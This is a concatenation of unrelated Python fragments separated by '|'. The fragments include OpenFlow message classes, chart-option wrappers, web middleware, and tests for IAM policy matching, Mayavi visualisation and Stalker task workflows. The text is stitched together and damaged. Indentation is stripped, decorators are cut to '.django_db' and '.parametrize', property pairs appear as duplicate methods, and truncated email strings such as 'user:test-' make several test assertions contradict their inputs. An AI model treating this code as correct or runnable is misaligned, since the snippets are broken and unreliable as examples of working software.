reader.skip(4)
obj.generation_id = reader.read('!Q')[0]
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
if (self.role != other.role):
return False
if (self.generation_id != other.generation_id):
return False
return True
def pretty_print(self, q):
q.text('role_request {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.text(',')
q.breakable()
q.text('role = ')
value_name_map = {0: 'OFPCR_ROLE_NOCHANGE', 1: 'OFPCR_ROLE_EQUAL', 2: 'OFPCR_ROLE_MASTER', 3: 'OFPCR_ROLE_SLAVE'}
if (self.role in value_name_map):
q.text(('%s(%d)' % (value_name_map[self.role], self.role)))
else:
q.text(('%#x' % self.role))
q.text(',')
q.breakable()
q.text('generation_id = ')
q.text(('%#x' % self.generation_id))
q.breakable()
q.text('}') |
.django_db
def test_agency_count_invalid_defc(client, monkeypatch, disaster_account_data, helpers, elasticsearch_award_index):
setup_elasticsearch_test(monkeypatch, elasticsearch_award_index)
helpers.patch_datetime_now(monkeypatch, 2022, 12, 31)
resp = helpers.post_for_count_endpoint(client, url, ['ZZ'])
assert (resp.status_code == status.HTTP_400_BAD_REQUEST)
assert (resp.data['detail'] == "Field 'filter|def_codes' is outside valid values ['9', 'L', 'M', 'N', 'O', 'P', 'Q']") |
def test_chained_cause_exception(elasticapm_client):
try:
try:
(1 / 0)
except ZeroDivisionError as zde:
raise ValueError('bla') from zde
except ValueError:
elasticapm_client.capture_exception()
error = elasticapm_client.events[ERROR][0]
assert (error['exception']['type'] == 'ValueError')
assert (error['exception']['cause'][0]['type'] == 'ZeroDivisionError') |
class OptionPlotoptionsColumnSonificationDefaultinstrumentoptions(Options):
def activeWhen(self) -> 'OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsActivewhen':
return self._config_sub_data('activeWhen', OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsActivewhen)
def instrument(self):
return self._config_get('piano')
def instrument(self, text: str):
self._config(text, js_type=False)
def mapping(self) -> 'OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsMapping':
return self._config_sub_data('mapping', OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsMapping)
def midiName(self):
return self._config_get(None)
def midiName(self, text: str):
self._config(text, js_type=False)
def pointGrouping(self) -> 'OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsPointgrouping':
return self._config_sub_data('pointGrouping', OptionPlotoptionsColumnSonificationDefaultinstrumentoptionsPointgrouping)
def roundToMusicalNotes(self):
return self._config_get(True)
def roundToMusicalNotes(self, flag: bool):
self._config(flag, js_type=False)
def showPlayMarker(self):
return self._config_get(True)
def showPlayMarker(self, flag: bool):
self._config(flag, js_type=False)
def type(self):
return self._config_get('instrument')
def type(self, text: str):
self._config(text, js_type=False) |
def transfer(frm, to, value, height, hash):
if ((len(deps) <= height) or (deps[height] != hash)):
return False
if (not (is_account_state_active(state[to]) and (height >= state[to].yes_dep.height))):
return False
if ((frm is not None) and (not (is_account_state_active(state[frm]) and (height >= state[frm].yes_dep.height)))):
return False
balance_delta(to, value, height, hash)
if (frm is not None):
balance_delta(frm, (- value), height, hash)
return True |
def _retrieveInfo(info, data):
if ('treatment' in info):
if ('meta' not in data):
data['meta'] = {}
data['meta']['treatment_diff'] = info['treatment'].get('diff', '')
data['meta']['treatment_version'] = info['treatment'].get('version', '')
data['meta']['treatment_commit'] = info['treatment'].get('commit', '')
if (('control' in info) and ('diff' in info['control'])):
if ('meta' not in data):
data['meta'] = {}
data['meta']['control_diff'] = info['control'].get('diff', '')
data['meta']['control_commit'] = info['control'].get('commit', '')
return data |
def update_item_config(item_type: str, package_path: Path, **kwargs: Any) -> None:
item_config = load_item_config(item_type, package_path)
for (key, value) in kwargs.items():
setattr(item_config, key, value)
config_filepath = os.path.join(package_path, item_config.default_configuration_filename)
loader = ConfigLoaders.from_package_type(item_type)
with open_file(config_filepath, 'w') as f:
loader.dump(item_config, f) |
class bsn_flow_idle_enable_get_request(bsn_header):
version = 6
type = 4
experimenter = 6035143
subtype = 38
def __init__(self, xid=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!L', self.experimenter))
packed.append(struct.pack('!L', self.subtype))
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = bsn_flow_idle_enable_get_request()
_version = reader.read('!B')[0]
assert (_version == 6)
_type = reader.read('!B')[0]
assert (_type == 4)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
_experimenter = reader.read('!L')[0]
assert (_experimenter == 6035143)
_subtype = reader.read('!L')[0]
assert (_subtype == 38)
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
return True
def pretty_print(self, q):
q.text('bsn_flow_idle_enable_get_request {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.breakable()
q.text('}') |
def extract_from_pdf(response):
pdf_content = response.content
pdf_reader = PyPDF2.PdfFileReader(io.BytesIO(pdf_content))
pdf_text = ''
for page_num in range(pdf_reader.getNumPages()):
pdf_text += pdf_reader.getPage(page_num).extractText()
pdf_text = re.sub('\\r\\n|\\r|\\n', ' ', pdf_text)
return split_paragraphs([pdf_text], 500) |
class ClusterResourceAttributes(_common.FlyteIdlEntity):
def __init__(self, attributes):
self._attributes = attributes
def attributes(self):
return self._attributes
def to_flyte_idl(self):
return _matchable_resource.ClusterResourceAttributes(attributes=self.attributes)
def from_flyte_idl(cls, pb2_object):
return cls(attributes=pb2_object.attributes) |
def populate_quantsarray(fname, feats_dir):
arr = {}
arr['fname'] = fname
quant = np.load(fname)
quant = (quant.astype(np.int64) + (2 ** 15))
assert (len(quant) > 1)
coarse = (quant // 256)
coarse_float = ((coarse.astype(np.float) / 127.5) - 1.0)
fine = (quant % 256)
fine_float = ((fine.astype(float) / 127.5) - 1.0)
arr['coarse'] = coarse
arr['coarse_float'] = coarse_float
arr['fine'] = fine
arr['fine_float'] = fine_float
return arr |
class TestTwoColumns(I3LayoutScenario):
def test_scenario(self):
for params in self.layout_params():
self.senario(params)
self._close_all()
def layout(self, params: List) -> str:
position = params[0]
return f'2columns {position}'
def layout_params(self) -> List:
return [['left']]
def alternate_layout(self) -> str:
return 'hstack'
def validate(self, args):
windows = self.workspaces.windows()
geoms = [self._get_window_geometry(window) for window in windows]
(column_1, column_2) = (geoms[::2], geoms[1::2])
for (i, geom) in enumerate(column_1[1:]):
assert (geom.height == approx(column_1[i].height, abs=1))
assert (geom.y > (column_1[i].y + column_1[i].height))
assert (geom.x == column_1[i].x)
if (len(column_2) > 0):
assert (geom.x < column_2[0].x)
for (i, geom) in enumerate(column_2[1:]):
assert (geom.height == approx(column_2[i].height, abs=1))
assert (geom.y > (column_2[i].y + column_2[i].height))
assert (geom.x == column_2[i].x) |
class IamPolicyTest(ForsetiTestCase):
def setUp(self):
self.members = ['user:test-', 'group:test-', 'serviceAccount:test-.com', 'allUsers', 'allAuthenticatedUsers', 'user:*', 'serviceAccount:**.gserviceaccount.com', 'user:*']
self.test_members = ['user:test-', 'serviceAccount:.com', 'user:', 'allUsers', 'allAuthenticatedUsers', 'user:anything']
def test_member_create_from_is_correct(self):
iam_member1 = IamPolicyMember.create_from(self.members[0])
self.assertEqual('user', iam_member1.type)
self.assertEqual('test-', iam_member1.name)
self.assertEqual('^test\\-user\\\\.com$', iam_member1.name_pattern.pattern)
iam_member2 = IamPolicyMember.create_from(self.members[3])
self.assertEqual('allUsers', iam_member2.type)
self.assertIsNone(iam_member2.name)
self.assertIsNone(iam_member2.name_pattern)
iam_member3 = IamPolicyMember.create_from(self.members[4])
self.assertEqual('allAuthenticatedUsers', iam_member3.type)
self.assertIsNone(iam_member3.name)
self.assertIsNone(iam_member3.name_pattern)
def test_member_match_works(self):
iam_policy_members = [IamPolicyMember.create_from(self.members[0]), IamPolicyMember.create_from(self.members[3]), IamPolicyMember.create_from(self.members[5]), IamPolicyMember.create_from(self.members[6]), IamPolicyMember.create_from(self.members[7]), IamPolicyMember.create_from(self.members[4])]
self.assertTrue(iam_policy_members[0].matches(self.test_members[0]))
self.assertTrue(iam_policy_members[1].matches(self.members[3]))
self.assertTrue(iam_policy_members[1].matches(self.test_members[3]))
self.assertTrue(iam_policy_members[2].matches(self.test_members[0]))
self.assertTrue(iam_policy_members[3].matches(self.test_members[1]))
self.assertTrue(iam_policy_members[4].matches(self.test_members[2]))
self.assertTrue(iam_policy_members[4].matches(self.test_members[5]))
self.assertTrue(iam_policy_members[5].matches(self.test_members[4]))
self.assertFalse(iam_policy_members[0].matches('user:not-'))
self.assertFalse(iam_policy_members[2].matches('user:.com'))
self.assertFalse(iam_policy_members[2].matches('user:'))
self.assertFalse(iam_policy_members[2].matches('user:.notmycompany.com'))
self.assertFalse(iam_policy_members[3].matches('serviceAccount:'))
def test_member_invalid_type_raises(self):
with self.assertRaises(InvalidIamPolicyMemberError):
iam_member = IamPolicyMember('fake_type')
def test_binding_create_from_is_correct(self):
binding = {'role': 'roles/viewer', 'members': self.test_members}
iam_binding = IamPolicyBinding.create_from(binding)
self.assertEqual(binding['role'], iam_binding.role_name)
self.assertEqual(binding['members'], _get_member_list(iam_binding.members))
self.assertEqual('^roles\\/viewer$', iam_binding.role_pattern.pattern)
binding2 = {'role': 'roles/*', 'members': self.test_members}
iam_binding2 = IamPolicyBinding.create_from(binding2)
self.assertEqual('^roles\\/.*$', iam_binding2.role_pattern.pattern)
def test_binding_missing_role_raises(self):
with self.assertRaises(InvalidIamPolicyBindingError):
IamPolicyBinding(None, ['*'])
def test_binding_missing_members_raises(self):
with self.assertRaises(InvalidIamPolicyBindingError):
IamPolicyBinding('roles/fake', [])
def test_binding_merge_members_other_type_different_raises(self):
with self.assertRaises(InvalidIamPolicyBindingError):
binding = {'role': 'roles/viewer', 'members': ['user:test-', 'serviceAccount:.com']}
iam_binding = IamPolicyBinding.create_from(binding)
iam_binding.merge_members([1, 2, 4])
def test_binding_merge_members_same_role_and_members(self):
binding = {'role': 'roles/viewer', 'members': ['user:test-', 'serviceAccount:.com']}
iam_binding1 = IamPolicyBinding.create_from(binding)
iam_binding2 = IamPolicyBinding.create_from(binding)
iam_binding1.merge_members(iam_binding2)
self.assertEqual(iam_binding1, iam_binding2)
def test_binding_merge_members_same_role_different_members(self):
binding1 = {'role': 'roles/viewer', 'members': ['user:test-', 'serviceAccount:.com']}
binding2 = {'role': 'roles/viewer', 'members': ['user:']}
expected_binding = {'role': 'roles/viewer', 'members': ['user:test-', 'serviceAccount:.com', 'user:']}
iam_binding1 = IamPolicyBinding.create_from(binding1)
iam_binding2 = IamPolicyBinding.create_from(binding2)
iam_binding1.merge_members(iam_binding2)
expected_binding = IamPolicyBinding.create_from(expected_binding)
self.assertEqual(expected_binding, iam_binding1)
def test_binding_merge_members_same_role_mixed_members(self):
binding1 = {'role': 'roles/viewer', 'members': ['user:test-', 'serviceAccount:.com']}
binding2 = {'role': 'roles/viewer', 'members': ['user:', 'serviceAccount:.com']}
expected_binding = {'role': 'roles/viewer', 'members': ['user:test-', 'serviceAccount:.com', 'user:']}
iam_binding1 = IamPolicyBinding.create_from(binding1)
iam_binding2 = IamPolicyBinding.create_from(binding2)
iam_binding1.merge_members(iam_binding2)
expected_binding = IamPolicyBinding.create_from(expected_binding)
self.assertEqual(expected_binding, iam_binding1)
def test_binding_merge_members_different_role(self):
binding1 = {'role': 'roles/owner', 'members': ['user:test-', 'serviceAccount:.com']}
binding2 = {'role': 'roles/viewer', 'members': ['user:']}
expected_binding = {'role': 'roles/owner', 'members': ['user:test-', 'serviceAccount:.com']}
iam_binding1 = IamPolicyBinding.create_from(binding1)
iam_binding2 = IamPolicyBinding.create_from(binding2)
iam_binding1.merge_members(iam_binding2)
expected_binding = IamPolicyBinding.create_from(expected_binding)
self.assertEqual(expected_binding, iam_binding1)
def test_policy_create_from_is_correct(self):
policy_json = {'bindings': [{'role': 'roles/editor', 'members': ['user:']}, {'role': 'roles/viewer', 'members': ['user:', 'group:']}]}
iam_policy = IamPolicy.create_from(policy_json)
actual_roles = [b.role_name for b in iam_policy.bindings]
actual_members = [_get_member_list(b.members) for b in iam_policy.bindings]
actual_audit_configs = iam_policy.audit_configs
expected_roles = ['roles/editor', 'roles/viewer']
expected_members = [['user:'], ['user:', 'group:']]
self.assertEqual(expected_roles, actual_roles)
self.assertEqual(expected_members, actual_members)
self.assertIsNone(actual_audit_configs)
def test_policy_create_from_with_audit_configs(self):
policy_json = {'bindings': [{'role': 'roles/editor', 'members': ['user:']}], 'auditConfigs': [{'service': 'allServices', 'auditLogConfigs': [{'logType': 'ADMIN_READ'}]}, {'service': 'storage.googleapis.com', 'auditLogConfigs': [{'logType': 'DATA_READ'}, {'logType': 'DATA_WRITE', 'exemptedMembers': ['user:', 'user:']}]}]}
iam_policy = IamPolicy.create_from(policy_json)
actual_roles = [b.role_name for b in iam_policy.bindings]
actual_members = [_get_member_list(b.members) for b in iam_policy.bindings]
actual_audit_configs = iam_policy.audit_configs.service_configs
expected_roles = ['roles/editor']
expected_members = [['user:']]
expected_audit_configs = {'allServices': {'ADMIN_READ': set()}, 'storage.googleapis.com': {'DATA_READ': set(), 'DATA_WRITE': set(['user:', 'user:'])}}
self.assertEqual(expected_roles, actual_roles)
self.assertEqual(expected_members, actual_members)
self.assertEqual(expected_audit_configs, actual_audit_configs)
def test_empty_policy_has_zero_length_bindings(self):
empty_policy = IamPolicy()
self.assertTrue(empty_policy.is_empty())
self.assertEqual(False, bool(empty_policy.bindings))
def test_member_create_from_domain_is_correct(self):
member = IamPolicyMember.create_from('domain:xyz.edu')
self.assertEqual('domain', member.type)
self.assertEqual('xyz.edu', member.name)
self.assertEqual('^xyz\\.edu$', member.name_pattern.pattern)
def test_is_matching_domain_success(self):
member = IamPolicyMember.create_from('domain:xyz.edu')
other = IamPolicyMember.create_from('user:')
self.assertTrue(member._is_matching_domain(other))
def test_is_matching_domain_fail_wrong_domain(self):
member = IamPolicyMember.create_from('domain:xyz.edu')
other = IamPolicyMember.create_from('user:')
self.assertFalse(member._is_matching_domain(other))
def test_is_matching_domain_fail_wrong_type(self):
member = IamPolicyMember.create_from('group:xyz.edu')
other = IamPolicyMember.create_from('user:')
self.assertFalse(member._is_matching_domain(other))
def test_is_matching_domain_fail_invalid_email(self):
member = IamPolicyMember.create_from('domain:xyz.edu')
other = IamPolicyMember.create_from('user:u AT xyz DOT edu')
self.assertFalse(member._is_matching_domain(other))
def test_audit_config_create_from_is_correct(self):
audit_configs_json = [{'service': 'allServices', 'auditLogConfigs': [{'logType': 'DATA_READ'}]}, {'service': 'storage.googleapis.com', 'auditLogConfigs': [{'logType': 'DATA_READ'}, {'logType': 'DATA_WRITE', 'exemptedMembers': ['user:', 'user:']}]}]
audit_config = IamAuditConfig.create_from(audit_configs_json)
expected_service_configs = {'allServices': {'DATA_READ': set()}, 'storage.googleapis.com': {'DATA_READ': set(), 'DATA_WRITE': set(['user:', 'user:'])}}
expected_audit_config = IamAuditConfig(expected_service_configs)
self.assertEqual(expected_service_configs, audit_config.service_configs)
self.assertEqual(expected_audit_config, audit_config)
def test_audit_config_create_from_bad_config(self):
audit_configs_json = [{'auditLogConfigs': [{'logType': 'DATA_READ'}]}]
with self.assertRaises(InvalidIamAuditConfigError):
audit_config = IamAuditConfig.create_from(audit_configs_json)
def test_audit_config_merge_succeeds(self):
configs1 = {'allServices': {'ADMIN_READ': set(['user:', 'user:']), 'DATA_READ': set()}, 'storage.googleapis.com': {'DATA_READ': set(), 'DATA_WRITE': set(['user:', 'user:'])}}
configs2 = {'allServices': {'ADMIN_READ': set(['user:', 'user:']), 'DATA_WRITE': set()}, 'cloudsql.googleapis.com': {'DATA_READ': set(), 'DATA_WRITE': set(['user:', 'user:'])}}
expected_configs = {'allServices': {'ADMIN_READ': set(['user:', 'user:', 'user:']), 'DATA_READ': set(), 'DATA_WRITE': set()}, 'cloudsql.googleapis.com': {'DATA_READ': set(), 'DATA_WRITE': set(['user:', 'user:'])}, 'storage.googleapis.com': {'DATA_READ': set(), 'DATA_WRITE': set(['user:', 'user:'])}}
audit_config1 = IamAuditConfig(configs1)
audit_config2 = IamAuditConfig(configs2)
expected_audit_config = IamAuditConfig(expected_configs)
audit_config1.merge_configs(audit_config2)
audit_config2.service_configs['cloudsql.googleapis.com']['DATA_READ'].add('user:extra_')
self.assertEqual(expected_audit_config, audit_config1) |
def prepare_middleware_ws(middleware: Iterable) -> Tuple[(list, list)]:
request_mw = []
resource_mw = []
for component in middleware:
process_request_ws = util.get_bound_method(component, 'process_request_ws')
process_resource_ws = util.get_bound_method(component, 'process_resource_ws')
for m in (process_request_ws, process_resource_ws):
if (not m):
continue
if ((not iscoroutinefunction(m)) and util.is_python_func(m)):
msg = '{} must be implemented as an awaitable coroutine.'
raise CompatibilityError(msg.format(m))
if process_request_ws:
request_mw.append(process_request_ws)
if process_resource_ws:
resource_mw.append(process_resource_ws)
return (request_mw, resource_mw) |
class _MultiMethod():
def __init__(self, name):
self.name = name
self.typemap = {}
def __call__(self, *args):
types = tuple((arg.__class__ for arg in args))
try:
return self.typemap[types](*args)
except KeyError:
raise TypeError(('no match %s for types %s' % (self.name, types)))
def register_function_for_types(self, types, function):
types_with_subclasses = []
for ty in types:
types_with_subclasses.append(([ty] + all_subclasses(ty)))
for type_tuple in itertools.product(*types_with_subclasses):
self.typemap[type_tuple] = function |
class TestGlyph(TestCase):
def make_data(self):
s = numpy.arange(0.0, 10.0, 0.01)
s = numpy.reshape(s, (10, 10, 10))
s = numpy.transpose(s)
v = numpy.zeros(3000, 'd')
v[1::3] = 1.0
v = numpy.reshape(v, (10, 10, 10, 3))
return (s, v)
def set_view(self, s):
s.scene.z_plus_view()
c = s.scene.camera
c.azimuth((- 30))
c.elevation(20)
s.render()
def check(self):
script = self.script
s = script.engine.current_scene
src = s.children[0]
g = src.children[0].children[1]
assert (g.glyph.glyph_source.glyph_position == 'center')
assert (g.glyph.glyph.vector_mode == 'use_normal')
assert (g.glyph.glyph.scale_factor == 0.5)
assert (g.actor.property.line_width == 1.0)
v = src.children[0].children[2]
glyph = v.glyph
gs = glyph.glyph_source
assert (gs.glyph_position == 'tail')
assert (gs.glyph_source == gs.glyph_list[1])
assert numpy.allclose(v.implicit_plane.normal, (0.0, 1.0, 0.0))
v = src.children[0].children[3]
glyph = v.glyph
gs = glyph.glyph_source
assert (gs.glyph_source == gs.glyph_list[2])
assert (gs.glyph_position == 'head')
assert numpy.allclose(v.implicit_plane.normal, (0.0, 1.0, 0.0))
def test(self):
self.main()
def do(self):
script = self.script
from mayavi.sources.array_source import ArraySource
from mayavi.modules.outline import Outline
from mayavi.modules.glyph import Glyph
from mayavi.modules.vector_cut_plane import VectorCutPlane
s = self.new_scene()
d = ArraySource()
(sc, vec) = self.make_data()
d.origin = ((- 5), (- 5), (- 5))
d.scalar_data = sc
d.vector_data = vec
script.add_source(d)
o = Outline()
script.add_module(o)
g = Glyph()
script.add_module(g)
g.glyph.glyph_source.glyph_position = 'center'
g.glyph.glyph.vector_mode = 'use_normal'
g.glyph.glyph.scale_factor = 0.5
g.actor.property.line_width = 1.0
v = VectorCutPlane()
glyph = v.glyph
gs = glyph.glyph_source
gs.glyph_position = 'tail'
gs.glyph_source = gs.glyph_list[1]
script.add_module(v)
v.implicit_plane.trait_set(normal=(0, 1, 0), origin=(0, 3, 0))
v = VectorCutPlane()
glyph = v.glyph
gs = glyph.glyph_source
gs.glyph_source = gs.glyph_list[2]
gs.glyph_position = 'head'
script.add_module(v)
v.implicit_plane.trait_set(normal=(0, 1, 0), origin=(0, (- 2), 0))
self.set_view(s)
self.check()
g.actor = g.actor.__class__()
glyph = g.glyph
g.glyph = glyph.__class__()
g.glyph = glyph
glyph = v.glyph
v.glyph = glyph.__class__()
v.glyph = glyph
v.actor = v.actor.__class__()
v.cutter = v.cutter.__class__()
ip = v.implicit_plane
v.implicit_plane = ip.__class__()
v.implicit_plane = ip
s.render()
self.check()
f = BytesIO()
f.name = abspath('test.mv2')
script.save_visualization(f)
f.seek(0)
engine = script.engine
engine.close_scene(s)
script.load_visualization(f)
s = engine.current_scene
self.set_view(s)
self.check()
sources = s.children
s.children = []
s.children.extend(sources)
self.set_view(s)
self.check()
sources1 = copy.deepcopy(sources)
s.children[:] = sources
self.set_view(s)
self.check() |
.parametrize('data', ({}, {'seed_version': (MIGRATION_FIRST - 1)}, {'seed_version': (MIGRATION_FIRST + 1)}))
def test_database_store_from_text_store_initial_version(tmp_path, data) -> None:
wallet_path = os.path.join(tmp_path, 'database')
text_store = TextStore(wallet_path, data=data)
try:
with pytest.raises(AssertionError):
DatabaseStore.from_text_store(text_store)
finally:
text_store.close() |
class TaskStatusWorkflowTestCase(unittest.TestCase):
def setUp(self):
super(self.__class__, self).setUp()
from stalker import User
self.test_user1 = User(name='Test User 1', login='tuser1', email='', password='secret')
self.test_user2 = User(name='Test User 2', login='tuser2', email='', password='secret')
from stalker import Status
self.status_new = Status(name='New', code='NEW')
self.status_wfd = Status(name='Waiting For Dependency', code='WFD')
self.status_rts = Status(name='Ready To Start', code='RTS')
self.status_wip = Status(name='Work In Progress', code='WIP')
self.status_prev = Status(name='Pending Review', code='PREV')
self.status_hrev = Status(name='Has Revision', code='HREV')
self.status_drev = Status(name='Dependency Has Revision', code='DREV')
self.status_oh = Status(name='On Hold', code='OH')
self.status_stop = Status(name='Stopped', code='STOP')
self.status_cmpl = Status(name='Completed', code='CMPL')
self.status_rrev = Status(name='Requested Revision', code='RREV')
self.status_app = Status(name='Approved', code='APP')
from stalker import StatusList
self.test_project_status_list = StatusList(name='Project Statuses', target_entity_type='Project', statuses=[self.status_wfd, self.status_wip, self.status_cmpl])
self.test_task_status_list = StatusList(name='Task Statuses', statuses=[self.status_wfd, self.status_rts, self.status_wip, self.status_prev, self.status_hrev, self.status_drev, self.status_oh, self.status_stop, self.status_cmpl], target_entity_type='Task')
from stalker import Repository
self.test_repo = Repository(name='Test Repository', code='TR', linux_path='/mnt/T/', windows_path='T:/', osx_path='/Volumes/T')
from stalker import Project
self.test_project1 = Project(name='Test Project 1', code='TProj1', status_list=self.test_project_status_list, repository=self.test_repo, start=datetime.datetime(2013, 6, 20, 0, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, 0, tzinfo=pytz.utc))
from stalker import Task
self.test_task1 = Task(name='Test Task 1', project=self.test_project1, responsible=[self.test_user1], status_list=self.test_task_status_list, start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task2 = Task(name='Test Task 2', project=self.test_project1, responsible=[self.test_user1], status_list=self.test_task_status_list, start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task3 = Task(name='Test Task 3', project=self.test_project1, status_list=self.test_task_status_list, resources=[self.test_user1, self.test_user2], responsible=[self.test_user1, self.test_user2], start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task4 = Task(name='Test Task 4', parent=self.test_task1, status=self.status_wfd, status_list=self.test_task_status_list, resources=[self.test_user1], depends=[self.test_task3], start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task5 = Task(name='Test Task 5', parent=self.test_task1, status_list=self.test_task_status_list, resources=[self.test_user1], depends=[self.test_task4], start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task6 = Task(name='Test Task 6', parent=self.test_task1, status_list=self.test_task_status_list, resources=[self.test_user1], start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task7 = Task(name='Test Task 7', parent=self.test_task2, status_list=self.test_task_status_list, resources=[self.test_user2], start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_task8 = Task(name='Test Task 8', parent=self.test_task2, status_list=self.test_task_status_list, resources=[self.test_user2], start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.test_asset_status_list = StatusList(name='Asset Statuses', statuses=[self.status_wfd, self.status_rts, self.status_wip, self.status_prev, self.status_hrev, self.status_drev, self.status_oh, self.status_stop, self.status_cmpl], target_entity_type='Asset')
from stalker import Asset, Type
self.test_asset1 = Asset(name='Test Asset 1', code='TA1', parent=self.test_task7, type=Type(name='Character', code='Char', target_entity_type='Asset'), status_list=self.test_asset_status_list)
self.test_task9 = Task(name='Test Task 9', parent=self.test_asset1, status_list=self.test_task_status_list, start=datetime.datetime(2013, 6, 20, 0, 0, tzinfo=pytz.utc), end=datetime.datetime(2013, 6, 30, 0, 0, tzinfo=pytz.utc), resources=[self.test_user2], schedule_timing=10, schedule_unit='d', schedule_model='effort')
self.all_tasks = [self.test_task1, self.test_task2, self.test_task3, self.test_task4, self.test_task5, self.test_task6, self.test_task7, self.test_task8, self.test_task9, self.test_asset1]
def test_walk_hierarchy_is_working_properly(self):
visited_tasks = []
expected_result = [self.test_task2, self.test_task7, self.test_task8, self.test_asset1, self.test_task9]
for task in self.test_task2.walk_hierarchy(method=1):
visited_tasks.append(task)
assert (expected_result == visited_tasks)
def test_walk_dependencies_is_working_properly(self):
visited_tasks = []
expected_result = [self.test_task9, self.test_task6, self.test_task4, self.test_task5, self.test_task8, self.test_task3, self.test_task4, self.test_task8, self.test_task3]
self.test_task9.depends = [self.test_task6]
self.test_task6.depends = [self.test_task4, self.test_task5]
self.test_task5.depends = [self.test_task4]
self.test_task4.depends = [self.test_task8, self.test_task3]
for task in self.test_task9.walk_dependencies():
visited_tasks.append(task)
assert (expected_result == visited_tasks)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_WFD_task_task(self):
self.test_task3.depends = []
self.test_task9.status = self.status_wip
assert (self.test_task9.status == self.status_wip)
self.test_task3.depends.append(self.test_task9)
assert (self.test_task3.status == self.status_wfd)
self.test_task8.status = self.status_wfd
assert (self.test_task8.status == self.status_wfd)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_RTS_task(self):
self.test_task3.depends = []
self.test_task9.status = self.status_wip
assert (self.test_task9.status == self.status_wip)
self.test_task3.depends.append(self.test_task9)
assert (self.test_task3.status == self.status_wfd)
self.test_task8.status = self.status_rts
assert (self.test_task8.status == self.status_rts)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_WIP_task(self):
self.test_task3.depends = []
self.test_task9.status = self.status_wip
assert (self.test_task9.status == self.status_wip)
self.test_task3.depends.append(self.test_task9)
assert (self.test_task3.status == self.status_wfd)
self.test_task8.status = self.status_wip
assert (self.test_task8.status == self.status_wip)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_PREV_task(self):
self.test_task3.depends = []
self.test_task9.status = self.status_wip
assert (self.test_task9.status == self.status_wip)
self.test_task3.depends.append(self.test_task9)
assert (self.test_task3.status == self.status_wfd)
self.test_task8.status = self.status_prev
assert (self.test_task8.status == self.status_prev)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_HREV_task(self):
self.test_task3.depends = []
self.test_task9.status = self.status_wip
assert (self.test_task9.status == self.status_wip)
self.test_task3.depends.append(self.test_task9)
assert (self.test_task3.status == self.status_wfd)
self.test_task8.status = self.status_hrev
assert (self.test_task8.status == self.status_hrev)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_OH_task(self):
self.test_task3.depends = []
self.test_task9.status = self.status_wip
assert (self.test_task9.status == self.status_wip)
self.test_task3.depends.append(self.test_task9)
assert (self.test_task3.status == self.status_wfd)
self.test_task8.status = self.status_oh
assert (self.test_task8.status == self.status_oh)
self.test_task3.depends.append(self.test_task8)
assert (self.test_task3.status == self.status_wfd)
def test_leaf_WFD_task_updated_to_have_a_dependency_of_STOP_task(self):
self.test_task3.depends = []
self.test_task9.status = self.status_wip
assert (self.test_task9.status == self.status_wip)
self.test_task3.depends.append(self.test_task9)
assert (self.test_task3.status == self.status_wfd)
self.test_task8.status = self.status_stop
assert (self.test_task8.status == self.status_stop)
